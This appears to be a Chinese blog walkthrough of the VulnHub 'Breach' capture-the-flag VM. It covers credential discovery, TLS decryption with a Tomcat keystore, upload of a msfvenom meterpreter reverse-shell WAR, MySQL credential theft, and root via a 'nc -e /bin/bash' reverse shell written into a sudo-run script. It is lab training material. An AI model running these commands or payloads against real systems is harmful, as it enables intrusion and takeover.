breach(vulnhub)
目录
靶机地址:链接:https://pan.baidu.com/s/1QFz_nMAIP0T9W616-myc_w
提取码:ogbz
靶机环境
靶机采用仅主机ip设置为192.168.110.0 默认为192.168.110.140
kali 攻击机192.168.128.128
还需要一个kali作为反弹连接,因为靶机在仅主机模式下,不能与攻击机交互,需要一个仅主机的kali
查看CMS信息
whatweb -v http://192.168.110.140/impresscms
apache 也就知道了默认路径 /var/www
keytool:输入口令tomcat
keytool -list -keystore keystore
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
# 输入一个已知密码就可以,导出一个证书文件
为什么需要这个证书?
#根据网页提示找到了keystore,知道它密码tomcat,查询到使用keytool,创建证书导入wireshark(编辑-首选项-protocols-TSL-edit),注意要找到http协议包的使用的端口
网址连接不上的问题:
这里采用代理服务器操作,因为浏览器的证书有问题,不可访问,采用中转BP(由BP作为受信任的客户端),我们已经在BP安装了证书,所以这里BP抓包放包是可以实现访问的。这里输入https才可以,抓包进去。
shell
进入到tomcat的管理系统。可以看到有文件上传,考虑上传一个war文件(因为war包是tomcat服务器能够自动识别)所以,以后看到tomcat的管理系统直接考虑war包
#新建一个文件夹:
mkdir breach,cd breach
#使用war方式
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=6666 -f war -o kali.war
#怎么把虚拟机的文件放到靶机里面?
xftp可以,这里直接使用kali自带的命令:sz file kali.war
#上传文件前:在用来监听的kali虚拟机准备好
msfconsole
use exploit/multi/handler
set java/meterpreter/reverse_tcp
set lhost 192.168.110.129
set lport 6666
exploit
#进入meterpreter后的思路:提升到交互式的shell
1.系统内核漏洞
2.history
3.sudo -l
#使用python提升到交互式的shell:
python -c 'import pty;pty. spawn("/bin/bash")'
提权:
#接下来的思路:
1.history
2.ls -a
3.sudo -l
4.etc/passwd
#都没线索,记得是apache的中间件 尝试/var/www,查看所有的文件,找到了mysql的账密。得到用户的密码。
cd /var/www
cd 5446
mysql -u root -p
use mysql;
show tables;
desc user;
select user,password from user;
#得到密码
su milton thelaststraw
ls -a 主目录
cat some_script.sh #没用
history
#尝试不到方法,想着之前看到的图片可能有信息:使用工具exiftool或者strings
exiftool * | grep -i -e 'File Name' -e 'Comment'
strings pill.png
#得到用户的密码
su blumbergh
1.history #没用
2.ls -a #没用
3.sodu -l #得到它可以用root身份执行程序,执行tidyup.sh
注意到 /usr/bin/tee #读取文件内容追加到另外一个文件里
echo "nc -e /bin/bash 192.168.110.129 9999" > shell.txt
nc -lvvp 9999
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
最终监听成功后显示失败。但是似乎没关系:
最后sudo passwd root
输入两次密码
就能登录
笔记本:(这里是记录收集到的信息)
步骤:查看源码,目录扫描,SQL注入,密码激活成功教程,文件上传
主页页面源代码:<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
MD5 32 0-9 A-F
SHA-1 40 0-9 A-F
base64解密两次 pgibbons:damnitfeel$goodtobeagang$ta
主页的图片:
http://192.168.110.140/images/bill.png
http://192.168.110.140/images/milton_beach.jpg
http://192.168.110.140/images/cake.jpg
http://192.168.110.140/images/swingline.jpg
http://192.168.110.140/images/troll.gif
http://192.168.110.140/impresscms #知道了CMS 直接使用whatweb -v url 查看信息
Apache[2.4.7], #默认路径 /var/www
http://192.168.110.140/impresscms/user.php #登录页面,,使用上面的账号密码
这是impress的CMS 尝试msf的searchsploit impresscms 全部尝试,无果
下载keystore文件 pcap file storepassword 和 keypassword 都设置为“tomcat”
使用keytool工具: E:\PTE\JDK1.8\bin下面使用
之后找数据包,找端口,网址。然后找到下一个网站的密码
进入后文件上传后监听成功:进入meterpreter,提权尝试内核漏洞:
靶机能看到Ubuntu 14.04,但是查不到提权漏洞
6450d89bd3aff1d893b85d3ad65d2ec2 thelaststraw milton的密码
利用图片得到 账号blumbergh coffeestains
今天的文章breach分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/61702.html
